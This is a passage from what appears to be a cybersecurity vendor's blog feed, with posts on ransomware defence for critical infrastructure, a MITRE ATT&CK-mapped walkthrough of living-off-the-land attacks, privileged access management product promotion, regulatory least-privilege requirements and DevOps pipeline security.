Of significant concern is the sharp rise of ransomware attacks targeting the critical infrastructure space. According to a report from The Institute for Critical Infrastructure Technology (ICIT), “if a SCADA or ICS system in an energy, utilities or manufacturing organization becomes infected with ransomware, then lives could be jeopardized in the time it takes to investigate the incident and return the systems to operation.”

A Zero Trust Playbook for Ransomware Protection

This May, CISA and the FBI issued guidance on protecting critical infrastructure from ransomware. Here is a look at three of their key recommendations for defense-in-depth ransomware protection:

  • Attacks on powerful ICS systems often begin with identity compromise at the endpoint and subsequent abuse of privileged credentials. The CISA and FBI provide the following guidance: “Ensure user and process accounts are limited through account use policies, user account control and privileged account management. Organize access rights based on the principles of least privilege and separation of duties.”
  • Securing and monitoring remote access to OT and IT networks is also critically important, since both internal and external users require access to ICS networks. This access increasingly involves remote connectivity sessions that can sometimes go unsecured and unmonitored for days or weeks. CISA and FBI authors recommend “limiting access to resources over networks, especially by restricting RDP. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.”
  • Implementing application whitelisting (also known as “allowlisting”) can help mitigate the risk of malware-based attacks by “only allowing systems to execute programs known and permitted by security policy.” CISA and FBI authors write, “Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/ decompression programs.”

Unusual user activity or unauthorized credential use to access an ICS asset could also indicate signs of an attack. Understanding the context of a user’s actions helps add another layer of security. Users will typically interact with the company system at the usual time, accessing the usual files. Anything that breaks the pattern can be flagged, logged and blocked. It’s one thing to be logging on from California at 12 noon on your usual laptop to begin work. It’s another to be logging on at midnight from a foreign country using a desktop PC.

This guidance follows the Zero Trust cybersecurity model of “never trust, always verify” and helps organizations to secure individual identities — whether human or machine — throughout the cycle of accessing critical OT and IT assets. When identities can be authenticated accurately, authorized with the proper permissions and given access to privileged assets in a structured manner, organizations are better-equipped to find attackers as they move throughout a network — and stop them before they can disrupt critical systems, threaten uptime and jeopardize consumer safety.

No Time to Waste

The U.S. Government has defined the critical infrastructure cybersecurity problem and outlined broad solutions, and will soon deliver its recommendations. The private industry has work to do meeting those goals — and as Shackelford and Hart urged their Black Hat audience — the time to act is now. With or without federal government enforcement.

]]>
Living Off the Land Ransomware Attacks: A Step-By-Step Plan for Playing Defense https://www.cyberark.com/blog/living-off-the-land-ransomware-attacks-a-step-by-step-plan-for-playing-defense/ Tue, 10 Aug 2021 18:00:15 +0000 https://www.cyberark.com/?p=122130 Living Off the Land Ransomware Attacks: A Step-By-Step Plan for Playing Defense

It’s been a staple of horror movies and espionage thrillers for years — the idea that something innocuous or trusted could suddenly turn against you. Unfortunately, what’s fodder for great fiction can also easily become cybersecurity reality.

In the digital realm, among the lurking sources of angst are living off the land (LotL) ransomware attacks — of course, their folksy name belies their insidious danger. The recent Kaseya supply chain ransomware attack is just the latest example; threat actors used the organization’s own technology resources against them to scale their attack — a hallmark of LotL. By infiltrating an endpoint and then gaining access to tools that were supposed to be there, they were able to worm deeper into the multi-layered network environment without raising alarms. These kinds of attacks give hostile agents two things they covet: access and time. You don’t know they’re there — you don’t know what they’re doing — and you may not know what they take with them when they go.

While these LotL scenarios don’t always end with a ransomware attack, the two increasingly go hand in hand and are as difficult to assess as they are to prevent. An effective protection strategy begins with a solid grasp of what constitutes an LotL ransomware attack and how it can impact your organization.

Let’s first review a quick history and common LotL techniques and procedures before assuming an attacker’s role to best explain some of the many ways this could go down.

The Lay of the Malevolent Land

Around 2017, fileless malware attacks started to gain mainstream attention after reports of hostile infections of legitimate IT systems belonging to the Democratic National Committee and other large organizations emerged.

Fileless malware made LotL possible. By eliminating the need to store the malicious payload in a file or install it directly on a machine, attackers could slip past anti-virus and other traditional endpoint security tools and move laterally through the environment, escalating privileges and uncovering new levels of access, until they reached the ultimate prize: systems, applications and databases containing critical business assets such as customer data and intellectual property.

To linger in systems and “live off the land” without detection, fileless malware often poses as a trusted tool with high privileges and access — such as legitimate tools used by system administrators to automate tasks and manage configurations. This allows attackers to monitor the environment, dump credentials and essentially take their time poking around under the guise of whitelisted, or trusted, tools.

Identifying, let alone stopping, these attacks is extremely difficult — especially if you’re dealing with a sophisticated ransomware actor who’s specifically targeting your organization. This is when effective cybersecurity information sharing can make all the difference and why businesses around the world rely on MITRE ATT&CK, an open-source framework comprising a vast knowledgebase of real-world adversarial tactics, techniques and procedures (TTPs) with a corresponding database that tracks the activities of numerous threat actors and cyber-criminal syndicates.

Just as the MITRE ATT&CK framework’s name implies, the system mimics the behavior of real-world attackers, which helps IT, information security and compliance organizations more effectively assess risk, identify security gaps and patch up vulnerabilities. By using a common taxonomy, security professionals including SOC staff, red and blue teams, pen testers and security vendors, can easily exchange information and collaborate using the same language, ultimately strengthening cybersecurity strategies.

Know Thy Enemy

At the core of the ATT&CK system is the idea that cybersecurity experts need to think like attackers. Unlike other security frameworks that focus on the tools and malware used by malicious actors, ATT&CK focuses on how adversaries interact with systems during an attack — so that’s exactly what we’re going to do here. This will be an attempt at a kind of “how-to” guide, with the understanding that no two attacks are necessarily alike. The LotL path is not linear and has a bit of a “choose your own adventure” element to it. It’s about reading the environment and developing an approach based on what you find there.

Let’s start with the consistencies. Most LotL attacks follow a similar pattern: abuse identities to infiltrate an enterprise network, compromise systems, escalate privileges and move laterally until they gain access to the sensitive systems they need to execute their attack or push ransomware.

But within each step exist divergent paths that make tracking and anticipating such attacks so challenging. Using ATT&CK analysis, we can break down behaviors and red flags to look for within critical stages of an LotL ransomware attack to help speed detection and reduce exposure and damage:

Stage 1 Make First Contact

After pre-attack preparations — from reconnaissance to resource development — are complete, the attacker has myriad ways to establish an initial entry point into the network. Many rely on tried-and-true phishing techniques, while some gain access by injecting malicious code or cross-site scripting into an otherwise normal online browsing experience to open vulnerabilities — known as a “drive-by compromise.” Or, as seen frequently in recent months, attackers could manipulate software before it reaches their targeted final consumer in a supply chain attack. Any one of these techniques — or a combination of more than one — will open the door.

Stage 2 Run Your Executables

Once inside, the ransomware attacker’s goal is to run the malicious code through a variety of options, from abusing popular IT admin tools to manipulate commands and execute processes, or even create uniform environments for remote and local access to corporate systems, which can open attack pathways. Additionally, as seen in the SolarWinds supply chain attack, adversaries can modify source code and push a seemingly innocuous security update, which is actually the malware in disguise.

Stage 3 Maintain the Foothold

This is the stage when LotL truly becomes LotL — when the attacker sets up shop and takes full advantage of the time and anonymity their techniques afford them. At this stage, the attacker may create their own accounts to maintain access to victim systems or use Logon AutoStart to execute programs automatically during system boots, maintain persistence or gain access to more powerful privileges on compromised systems while they go about their slow and deliberate work.

Stage 4 Take it Up a Notch

Now that the attacker is settled in, it’s time to gain higher-level permissions. Many attackers go for domain account credentials — particularly those of domain administrators who have far-reaching access to Tier0 systems like Active Directory and prefer service accounts linked to non-human identities, as these account passwords are infrequently changed. Through techniques like OS credential dumping, attackers obtain and discard login information as they creep closer to the keys for the most powerful systems. Again, this is all conducted under the guise of “legit” accounts and tools to evade defenses.

Stage 5 Forge an All-Access Pass

With domain admin privileges in hand, the attacker can stealthily manipulate domain controllers, pulling password data from Active Directory by running DCSync, which may yield current and historical hashes of potentially useful accounts or attempt to access Local Security Authority (LSA) secrets for service account information. One technique called “Kerberoasting” can be used to crack passwords offline. Attackers can also try to perform a Kerberos authentication “Golden Ticket” attack, which can lead to a complete network takeover and massive business disruption.

Stage 6 Move with Ease to Accomplish Goal

Now free to move without resistance or fear of detection, the attacker focuses on lateral movement to leave no digital stone unturned. Their forged Kerberos keys allow them to “pass the ticket,” circumventing security and access controls while they search for data to mine and wait for the perfect moment — often when the victim organization is most vulnerable — to exfiltrate sensitive data and then encrypt files and demand a ransom. In other instances, the attacker may use valid accounts to interact with a remote network share using Server Message Block (SMB), allowing them to perform actions, purportedly as the logged-on user, to accomplish their goals.

So now that we’ve seen a few pages of the opponent’s playbook, what can we do about it? With so many proven techniques at attackers’ disposal, it can be challenging to figure out how to address areas of vulnerability or where to begin. Devising an effective ransomware protection strategy mapped to the MITRE ATT&CK framework requires organizations to investigate areas across the attack chain that present the highest levels of risk and prioritize them accordingly. But when it comes to mitigating the damage done by LotL attacks, stage one is typically the place to start.

A multi-layered endpoint security approach combining least privilege defense, strong authentication for identities, credential theft protection, application control and ransomware blocking will make it significantly harder for attackers to gain entry and maintain persistence. For once they get a foothold, it becomes increasingly easy for them to cover their tracks and scale their efforts.

As recent history shows, it may be impossible to completely wall off your “land,” but you can make it a lot more inhospitable to those seeking to plunder it.

]]>
Introducing the CyberTalk with CyberArk Podcast Series: On-the-Go Cybersecurity Insights https://www.cyberark.com/blog/introducing-the-cybertalk-with-cyberark-podcast-series-on-the-go-cybersecurity-insights/ Wed, 04 Aug 2021 13:00:12 +0000 https://www.cyberark.com/?p=121985 Introducing the CyberTalk with CyberArk Podcast Series: On-the-Go Cybersecurity Insights

Ninety-one percent of cybersecurity practitioners agree they must keep up with their skills, or the organizations they work for are at a significant disadvantage against today’s cyber adversaries, according to a new Information Systems Security Association (ISSA) survey. Yet, digging into the latest headlines and continuously learning and training is tough when your days are full and your job description seems to expand daily.

You need timely, digestible insights — in-between meetings, on the road or during your morning run. Our new 12-part podcast series, CyberTalk with CyberArkhosted by Cybercrime Magazine, delivers just that.

The first two episodes are available now. New tracks featuring CyberArk researchers and thought leaders drop every other Tuesday — so subscribe today!

Why and How Organizations Need to Implement Identity Security

Imagine your organization is under attack, and the clock is ticking. But since your adversary has privileged access to every endpoint and system and can impersonate any identity within your environment, you don’t even know you’re being targeted. Can you protect your most critical assets?

In the inaugural episode of CyberTalk, CyberArk Founder, Chairman and CEO Udi Mokady joins host Hillarie McClure to explore the evolving threat landscape and new identity battleground. He breaks down what Identity Security means, why it matters and what clear steps organizations can take to mitigate risk and build cyber resilience.

By embracing a Zero Trust mindset and assuming that any identity — human or machine — in your network may have been compromised, you can turn your attention to identifying, isolating and stopping attacks before they can do harm. Tune in to the full episode to learn more.

Identity Access Management and the Ransomware Connection

Part of having the “coolest job at CyberArk” involves teaching security practitioners how to apply cutting-edge research to their own cybersecurity programs, so they can think like attackers and stay one step ahead.

In this episode, CyberArk Technical Evangelist Andy Thompson deconstructs recent major ransomware attacks and identifies the common denominator across them all: the compromise of identity and subsequent manipulation of privileged credentials. He uncovers findings from CyberArk Labs’ extensive analysis of more than 3 million ransomware samples and outlines proven mitigation techniques to help stop ransomware in its tracks. Catch the full podcast here.

Don’t Miss an Episode — Follow Cybercrime Magazine on SoundCloud

In the next CyberTalk with CyberArk podcast available August 10, get trending threat research insights from Lavi Lazarovitz, head of CyberArk Labs. Then, it’s back to school with Matt Kenslea on August 24. He’ll discuss top-of-mind Identity Security considerations for educational institutions, along with state and local government entities.

Find and follow the Cybercrime Magazine podcast for on-demand episodes on SoundCloud or wherever you get your podcasts.

]]>
Ransomware Protection, a Gold-Medal Team Approach https://www.cyberark.com/blog/ransomware-protection-a-gold-medal-team-approach/ Fri, 30 Jul 2021 13:00:50 +0000 https://www.cyberark.com/?p=121656 Ransomware Protection

If the cybersecurity industry was to adopt a motto, the Summer Games’ 2021 “Faster, Higher, Stronger — Together” adaptation should serve as inspiration. As high-profile ransomware attacks continue unabated, the need for a collaborative and unified security approach has never been greater.

Combating today’s advanced cyber threats requires a powerful combination of deep security expertise, diverse experience, shared intelligence, proven processes and defense-in-depth tools — something no single vendor can fully address. That’s why cybersecurity needs to be tackled as a “team game,” and organizations have a vested interest in partnering with one another to build upon strengths and deliver holistic solutions that help defenders stay a step ahead.

At CyberArk, this belief is a foundational tenet in our approach to building technology partnerships that deliver long-term value to our customers. And our C3 Alliance is proof of this ongoing commitment. Today, we have more than 100 certified partnerships with leading providers of enterprise software, infrastructure and security solutions — all featured on the CyberArk Marketplace. This team game mindset is also why we’re part of the Identity Defined Security Alliance (IDSA), a growing community dedicated to helping organizations reduce the risk of breach by combining identity and security strategies.

Training for the Big Game… Ransomware Hunt

Security teams aren’t the only ones preparing for the main event — the inevitable breach. With an eye on the prize, attackers are just as busy innovating and forging alliances. Take ransomware attackers, for example. To accomplish large-scale, targeted campaigns, often referred to as “big-game hunting,” they need to put in the work in advance, pooling necessary resources, doing reconnaissance on their intended victim organization (often for months or even years) and meticulously social engineering specific individuals with direct access to critical assets and systems.

In the following ransomware attack chain example, the attackers’ goal is to hold a global financial service organization’s highest value data hostage through encryption and then execute a double-extortion attack by planting a hidden back door. It’s a sophisticated sequence, but one that’s growing in popularity. Here are four attack steps necessary for them to “stick the landing:”

  1. Deliver ransomware on the endpoint. The attackers use social engineering tactics to identify their targets — which include highly privileged Microsoft Windows and MacOS administrator accounts — then phishes for poorly protected credentials to gain an initial foothold. This is relatively easy to accomplish since maintaining visibility of dynamic admin privileges on endpoints is a challenge for many organizations, while managing them securely without hindering productivity is notoriously difficult.
  2. Escalate privileges and fortify access. Once inside, the attackers move between identities, applications and systems to uncover new levels of privileged access to plant and execute the code. They also take evasive action, disabling existing endpoint security and security monitoring tools where possible so they can search for more machines and sensitive data.
  3. Maximize attack impact. As the ransomware propagates, the attackers disrupt backups, delete shadow copies and unlock files to maximize the impact of the attack — while leaving hidden identities and a back door for future data extortion.
  4. Execute ransomware. The attackers accomplish this by using read/write permissions to encrypt files, holding them captive and demanding a sky-high ransom, knowing that the organization is highly motivated to pay because of downtime sensitivities.

Fighting Ransomware with a Team Approach

To outperform their adversaries, defenders must do more than just find and block the malware itself. A winning approach to ransomware protection also involves controls and methods that stop attackers from gaining and using powerful privileges to do harm — at every point in the attack chain. This takes a collaborative team effort.

Strong security at the endpoint involves an endpoint detection and response (EDR) solution. EDR technology has come a long way in recent years, and can capture endpoint activity through continuous monitoring, deliver visibility and in-depth analysis and accelerate security operations efforts. According to a 2021 SANS survey, 51.6% of compromises were detected by EDR solutions. And yet, these tools are not designed to specifically look at and securely manage identity and privilege — on which many ransomware attacks depend.

That’s where a reliable teammate who’s trained hard and proven their value comes in: CyberArk Endpoint Privilege Manager (and yes, we can keep this Summer Games analogy going all day long). Designed to substantially reduce the identity-related attack surface presented by distributed endpoints, CyberArk Endpoint Privilege Manager combines least privilege defense, credential theft protection, application control and ransomware blocking. This creates an environment in which other security solutions can play their roles more effectively

In our example attack above, EDR could recognize and stop known ransomware, while prioritizing alerts and fast-tracking investigation and response efforts. For strains evading detection, CyberArk Endpoint Privilege Manager would make it difficult for attackers to gain an initial foothold by automatically removing admin accounts left on endpoints — while blocking attempts to steal credentials cached by web browsers, password managers, single sign-on solutions and other programs.

If any ransomware managed to get through, CyberArk Endpoint Privilege Manager’s strong application controls would allow it to run only under certain conditions, with set policies around read, write and modify capabilities. Meanwhile, lateral movement would be restricted by multi-factor authentication (MFA), and strong least privilege enforcement would inhibit further propagation and damage. What’s more, the attackers’ chances of building (and successfully hiding) a back door would be significantly reduced.

This dynamic duo also works in concert to help organizations mitigate the risk of future attacks. CyberArk Endpoint Privilege Manager produces valuable intelligence on privilege abuse attempts, which can be used to extend EDR solutions’ capabilities so endpoint attacks can be identified and blocked before impact.

Endpoint Security Team Approach

Getting Ransomware-Ready

“All organizations must recognize that no company is safe from being targeted by ransomware, regardless of size or location,” wrote U.S. Deputy National Security Advisor for Cyber and Emerging Technology Anne Neuberger in a recent memo.

Of course, getting ransomware-ready doesn’t end with beefing up your organization’s integrated security toolkit. Ongoing cybersecurity training, bidirectional information sharing, adherence to strong cybersecurity fundamentals and frameworks and a strong focus on data hardening are also essential elements of a multi-layered strategy.

“To understand your risk, business executives should immediately convene their leadership teams to discuss the ransomware threat and review corporate security posture and business continuity plans to ensure you have the ability to continue or quickly restore operations,” Neuberger wrote.

And cybersecurity companies play a critical role in helping organizations prepare. By embracing a team approach — and working together in solidarity — our industry as a whole can drive more responsible, accountable and effective control of the digital IT environment. That helps organizations combat evolving ransomware threats and gives them the security confidence to achieve their own gold-medal goals.

]]>
Stopping Cyber Threats with Unstoppable Innovation https://www.cyberark.com/blog/stopping-cyber-threats-with-unstoppable-innovation/ Mon, 26 Jul 2021 13:00:25 +0000 https://www.cyberark.com/?p=121216 Stopping Cyber Threats with Unstoppable Innovation

Several powerful and unforeseen market forces are driving the need for new, innovative approaches to combat evolving cyber threats. Central to achieving this critical mission is securing privileged access — the common thread woven across all of today’s most devastating attacks.

According to Gartner, “Privileged Access Management (PAM) continues to be a top-ten security control, and recent highly visible cybersecurity incidents in the news have demonstrated that the impact of breaches are not just online, but have spilled into the physical world. As such, PAM tools are crucial for mitigating these risks.”1

The pandemic dramatically accelerated the rate of change organizations experienced, with many fundamentally transforming the way they do business — from the inside out. This is evidenced in the widespread migration of workloads from self-hosted data centers to third-party hosted public clouds, and rapid rise in “born-in-the-cloud” enterprises. In these hybrid and multi-cloud IaaS environments, the very nature of privileged access risk has changed, driving many organizations to seek new ways to secure permissions and entitlements for human and machine identities to access critical cloud resources — and many industry players to include such solutions in their future product roadmaps.

Today, CyberArk is the only vendor to offer a cloud infrastructure entitlements management (CIEM) solution within its Privileged Access Management portfolio. CyberArk Cloud Entitlements Manager is an AI-powered SaaS solution that delivers measurable risk reduction by implementing least privilege across cloud environments.

The shift to DevOps and recent surge in digital supply chain attacks has led to new requirements for advanced Privileged Access Management solutions. There’s a critical need to secure the development pipeline as well as build time and run environments without burdening software developers. On this front, we continue to deliver security at the speed of innovation.

CyberArk received the highest score for the “Secrets Management” use case in the “2021 Gartner® Critical Capabilities for Privileged Access Management report.”2 Our DevOps secrets management solutions enable applications and automation tools to securely access sensitive resources at scale. We continue to focus on DevSecOps and developer enablement, further expanding our robust integrations with DevOps tools and support for complex use cases.

Our Commitment to Continuous Innovation and Passion for Security Excellence

Innovation is in our DNA at CyberArk, and we’re significantly investing in product evolution while reimagining how we engage with and support our customers as they face increasingly complex business challenges and cyber threats.

From our transition to a subscription business model to our new cloud-native offerings, to the expanded number of access-, privilege- and secrets-related use cases we address, to our extensive integration ecosystem of more than 700 strategic partners — and counting, we continue to deliver on our Identity Security vision and drive value and results for our customers.

2021 Gartner® Magic Quadrant for PAM: The Results Are In

For the third time running, CyberArk has been named a Leader in the “2021 Gartner® Magic Quadrant™ for Privileged Access Management.”3 CyberArk was positioned both highest in ability to execute and furthest in completeness of vision.

As a Magic Quadrant Leader in PAM for past three years and also with a history of consistent delivery and execution of product innovation and business stability, PAM remains at the heart of our Identity Security strategy. We believe, while other vendors experience growing pains and product-line consolidation challenges post-acquisition, our unwavering growth and accelerating business momentum continues to extend this foundational strength. We deliver unmatched customer satisfaction while boosting operational efficiencies and driving down cybersecurity risk – at scale.

From best-in-class credential management and privileged task automation, to advanced Just-in-Time functionality, numerous Privileged Access Management capabilities within the end-to-end CyberArk Identity Security Platform are positioned in the Gartner companion report, “2021 Critical Capabilities for Privileged Access Management.”4 Out of the 10 vendors evaluated, CyberArk received the highest technical score for the “Global Enterprises,” “Midsize and Large Enterprises,” “Secrets Management,” and “Privileged Account and Session Management” use cases.

The breadth and depth of the CyberArk portfolio of SaaS-delivered and advanced on-premises offerings is unmatched. And since this evaluation was completed, we’ve continued to drive momentum in the market by unveiling new cloud solutions and shared services to help global organizations secure high-risk access, broaden protection across cloud and hybrid environments and achieve a Zero Trust-based approach to protecting human and machine identities.

We are honored by this recognition and would like to thank our customers around the world, who have demonstrated heroic resilience during this sustained period of challenges, along with our partners and employees who continue to both impress and humble us for their unwavering dedication and pursuit of security excellence. You are the cornerstone of our success and we are grateful for each of you.

Download your complimentary report copies of the 2021 Gartner® Magic Quadrant™ for Privileged Access Management and 2021 Gartner Critical Capabilities for Privileged Access Management to learn more.

 

1, 2, 4Gartner, 2021 Gartner Critical Capabilities for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, Swati Rakheja, 19 July 2021

3 – Gartner, 2021 Gartner Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, Swati Rakheja, 19 July 2021

Gartner Disclaimers

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

]]>
Reduce Cloud Compliance Risk with Least Privilege https://www.cyberark.com/blog/reduce-cloud-compliance-risk-with-least-privilege/ Fri, 23 Jul 2021 13:00:41 +0000 https://www.cyberark.com/?p=121188 Reduce Cloud Compliance Risk with Least Privilege

Meeting regulatory compliance requirements is one of global organizations’ top challenges as they scale cloud deployments and embrace multi-cloud strategies to drive business efficiencies. The burgeoning number of identities within public cloud environments is a major contributor to this massive compliance conundrum. Every single human and machine identity in a cloud environment can be configured with thousands of different permissions to access workloads containing sensitive information — from intellectual property to customer data.

Excessive Permissions Create Cloud Security and Compliance Risks

Excessive, unused and misconfigured cloud permissions expose organizations to the risk of a data breach, which costs organizations an average of $3.86 million dollars, according to Ponemon Institute and IBM research. And according to the same research, cloud-specific breaches cost even more at $4.41 million on average. Compliance violations and financial penalties are becoming an even greater part of overall breach cost, thanks to tightening cybersecurity regulations and oversight around the world.

Seven Regulatory Frameworks that Require Least Privilege

An attacker controlling an identity with excessive permissions can steal or reach sensitive information easily, often without detection. Because of this — and regardless of your organization’s industry or geographic location — one thing regulatory bodies, industry frameworks and public cloud service providers all emphasize is the need for least privilege enforcement. Working to continuously ensure that all identities have the minimum permissions necessary to perform their duties is a fundamental best practice for reducing risk exposure and is aligned with a Zero Trust security approach.

Here’s a look at seven select frameworks that require least privilege:

1. SWIFT Customer Security Controls Framework. Financial institutions in the Society of Worldwide Interbank Financial Telecommunication (SWIFT) must routinely comply with Mandatory Security Control #5, “Logical Access Controls.” SWIFT members must self-attest that they “enforce the security principles of need-to-know access, least privilege and segregation of duties for operator accounts.”

2. Payment Card Industry Data Security Standard (PCI DSS). Per PCI DSS Requirement 7, businesses managing cardholder data must “ensure critical data can only be accessed by authorized personnel, systems and processes must be in place to limit access based on need to know and according to job responsibilities.” The regulation continues, “Need to know is when access rights are granted to only the least amount of data and privileges needed to perform a job.”

3. National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity. NIST states in PR.AC-4: “Access permissions and authorizations [should be] managed, incorporating the principles of least privilege and separation of duties.”

4. American Institute of Certified Public Accountants’ SOC for Cybersecurity. Organizations developing software applications and pursuing SOC I or SOC II certifications must complete attestations of their compliance with AICPA Trust Services Criteria. SOC I or SOC II certification requires “the entity authorizes, modifies, or removes access to data, software, functions, and other protected information assets based on roles, responsibilities, or the system design and changes, giving consideration to the concepts of least privilege and segregation of duties, to meet the entity’s objectives.”

5. Health Insurance Portability and Accountability Act (HIPAA). Key HIPAA components such as the Privacy Rule and Security Rule place firm restrictions on unnecessary access to protected health information (PHI) and limit all access to the “minimum necessary” standard. For example, the HIPAA Privacy Rule states that covered entities “must develop and implement policies and procedures that restrict access and uses of protected health information based on the specific roles of the members of their workforce.”

6. General Data Protection Regulation (GDPR). The European Union’s GDPR Article 25 stipulates businesses must proactively implement “Technical and organizational measures for ensuring that, by default, only personal data which are necessary for each specific purpose… are processed.” In other words, organizations must proactively restrict unnecessary access to personal data to comply with GDPR.

7. California Consumer Privacy Act (CCPA). The CCPA specifies in Section 11 that “Any consumer whose nonencrypted or nonredacted personal information… is subject to an unauthorized access and exfiltration, theft, or disclosure as a result of the business’s violation of the duty to implement and maintain reasonable security procedures and practices… to protect the personal information may institute a civil action…” Under CCPA, penalties are variable and businesses who expose large amounts of consumer data through insufficient access controls could face significant penalties.

A number of security research frameworks, including the MITRE ATT&CK Framework and Cloud Security Alliance Cloud Controls Matrix, echo similar least privilege guidance, as do all of the leading cloud providers.

Cl

Despite widespread consensus on the importance of least privilege, effectively managing permissions remains a significant challenge for many organizations due to rampant misconfigurations and common provisioning practices that assign default permissions based on department or role. The result? Many identities have permissions that they do not need or use, creating significant security and compliance risk.

To make cloud permissions management actually manageable, many security and Identity and Access Management (IAM) teams are turning to AI-powered solutions that can automatically detect and clean up misconfigured and unused cloud permissions, while applying least privilege controls consistently across their cloud estates.

In the words of former U.S. Deputy Attorney General Paul McNulty, “If you think compliance is expensive, try non-compliance.” Don’t wait for an audit — or a costly breach — to identify your cloud compliance gaps. Give our SaaS-based CyberArk Cloud Entitlements Manager a 30-day free trial and assessment to analyze and remediate excessive access in your cloud environments — with no infrastructure required. See how you can meet regulatory mandates around least privilege access while safely scaling your business in the cloud.

]]>
4 Risk-Based Steps for Securing Developers and Code https://www.cyberark.com/blog/4-risk-based-steps-for-securing-developers-and-code/ Fri, 16 Jul 2021 13:00:24 +0000 https://www.cyberark.com/?p=120732 4 Risk-Based Steps for Securing Developers and Code

As software supply chain attacks surge in frequency and scale, it’s become apparent that cyber criminals are looking for stealthy ways to make malicious changes or inject malware into software — before it’s deployed — often by compromising developers’ credentials or the administrative privileges of a development tool. Once a powerful password or key is stolen, it’s easy to tweak a software library or modify a few image registry settings to inject malware or compromise pipelines in a way that is often exceedingly difficult to detect.

More troubling still, many users — including developers — are over-privileged users who have access to broad swaths of an IT environment — in other words, they’re highly attractive targets. And in many cases, they’re shouldering more responsibility for managing these environments. According to Brandon Traffanstedt, senior director in CyberArk’s global technology office, cyber criminals have taken note that some of the easiest targets are developers with access rights that allow them to configure a wide range of systems to provision applications — but without the greatest appreciation for security. “Cyber criminals know developers are given as much access as they need,” he says. “We need to secure their identities — and their access — without constraining the amazing work they’re doing.”

The Trouble with Securing Identities Across a DevOps Pipeline

Cyber criminals target developers for two primary reasons. The first is to exploit the elevated privileges they require to access a wide range of applications and platforms strewn across an extended enterprise. The second is to uncover as many application secrets as possible that might reside within code, in environmental variables or anywhere outside of a secure secret store or vault. A recent example of this is the April 2021 Codecov breach, during which attackers gained access to a credential based on an error in the company’s Docker image creation process. They used this credential to modify Codecov’s Bash Uploader script and used that to harvest exposed credentials and secrets — too often easy and unprotected targets — from numerous customer CI/CD environments.

Some organizations have a large number of users who are privileged users “by default,” with elevated access rights whether they need them or not. Developers, however, have privileged access to more crucial platforms than almost anyone else and are relied upon to ensure that modern businesses remain competitive. As responsibility for managing applications on an end-to-end basis becomes the norm, the more control over IT environments a developer is likely to have. “There’s been an organic shift left with developers and pipelines making up the lifeblood of successful businesses — from pizza delivery to insurance,” says Traffanstedt.

The challenge is finding a way to ensure applications are built and deployed securely without slowing down the application development process, notes Traffanstedt. “Security needs to be part of the overall quality assurance process already in place to provide a foundation that developers can use to make their lives easier,” he says. Otherwise, the notion of security as a roadblock to agile development will persist.

Fortunately, developers are making progress. As organizations increasingly embrace DevSecOps best practices, there’s a greater awareness of how vulnerable software supply chains really are and what can be done to incorporate transparent security. The simplest phishing attack can result in losing a set of credentials that provides cyber criminals with the keys to the entire development environment.

Unfortunately, organizations can’t wait for developers to master all the nuances of cybersecurity on their own or expect developers to keep security common practices top-of-mind. Security teams have been given a clear mandate to protect the software supply chain, starting with who (or what) is allowed to access what, when and for how long. The challenge is finding a way to achieve that goal while having the least possible impact on developer productivity. After all, as organizations become more dependent on software to drive digital processes, the rate at which software is built, deployed and updated directly correlates to corporate financial performance.

Risk Management in the Age of Shift Left

Cybersecurity has always been about limiting risk. Securing software supply chains in that regard is no different than in any other IT environment — but it has to be done fast. Here are steps to bolster DevOps security while maintaining developer velocity, focusing on addressing the most risk most efficiently.

The first order of security business is always going to be securing the workstations and tools developers use regularly.

1. Secure Developer Workstations and Tools

Sometimes, developers need to elevate certain tools they use to write and commit code. Many organizations solve this by providing full local administrative rights. This should never be the default, and the principle of least privilege should be consistently enforced. “The goal is to reduce, if not completely eradicate, the number of local administrators that you have while providing just the right level of elevation based on policy,” says Traffanstedt.

And since many credential theft attacks can be executed without local admin rights and from a single developer’s workstation, it’s also important to protect against credential theft from browsers where application secrets might be stored to access repositories or tools with command line interfaces (CLI) — and where those same secrets can be stored right in configuration files. The key to this approach is leveraging solutions that do not require archaic allow/deny listing policies but instead provide proactive and predictive controls

2. Secure the Automation

Another threat vector that needs to be secured is the automation frameworks developers now routinely employ to configure infrastructure as code, along with the ever-growing list of developer tools used throughout the pipeline. It’s just as critically important to both manage and rotate the secrets used by these tools and platforms, as well as to ensure that applications and processes authenticate securely to retrieve those managed secrets. Otherwise, you’ve done a significant amount of work for very little value.

Many of the tools and the services offered by cloud vendors and container platforms have some built-in secrets management capabilities. However, each tool vendor takes a different approach to security, has a varying level of maturity and experience and uses different interfaces — effectively establishing its own “island of security.” Using these native secrets management capabilities is certainly better than no security at all, says Traffanstedt. “But at some point, when it comes to simplifying compliance and configuration in addition to supporting code portability, having one centralized store of record can allow you to identify gaps in policy and push changes much faster than liaising with disparate tools and providers.”

3. Determine Who Really Needs Access to What

The next step is to determine who precisely on any development team can commit source code and elevate binaries as part of a DevOps workflow. Not every member of the DevOps team needs to have full administrative rights to every system and tool that make up the pipeline.

Just-in-time privileged access controls can give specific developers the flexibility to access what they need, when they need it, based on role. When privileges must be elevated, cybersecurity teams should monitor the resources that are being accessed — and by whom. In many cases, it becomes apparent that many developers only need local admin rights to write code. Only a handful of members of the development team are often responsible for managing code commits and elevating code into production environments. “Organizations need to make sure they take a least privilege approach to managing access across the DevOps pipeline,” says Traffanstedt.

4. Secure Tier 0 Access to Resources and VMs

In a similar vein, developers should not have direct access to virtual machines in production environments. If they require access, they should broker it through session management or a secure web access gateway to minimize risks. As with all security controls, exceptions will occur and those should be subject to a heightened level of approval and scrutiny. Under no circumstances should exceptions made to policies be allowed to become permanent. If a policy activation is permanent or very loosely restricted, then it is essentially the equivalent of standing access. There needs to be a strict process for approving the assignment and activation of policies across the entire DevOps workflow. Keep in mind that in a perfect world, human hands would not touch infrastructure directly in day-to day-operations — instead, they would leverage elements of automation to make changes.

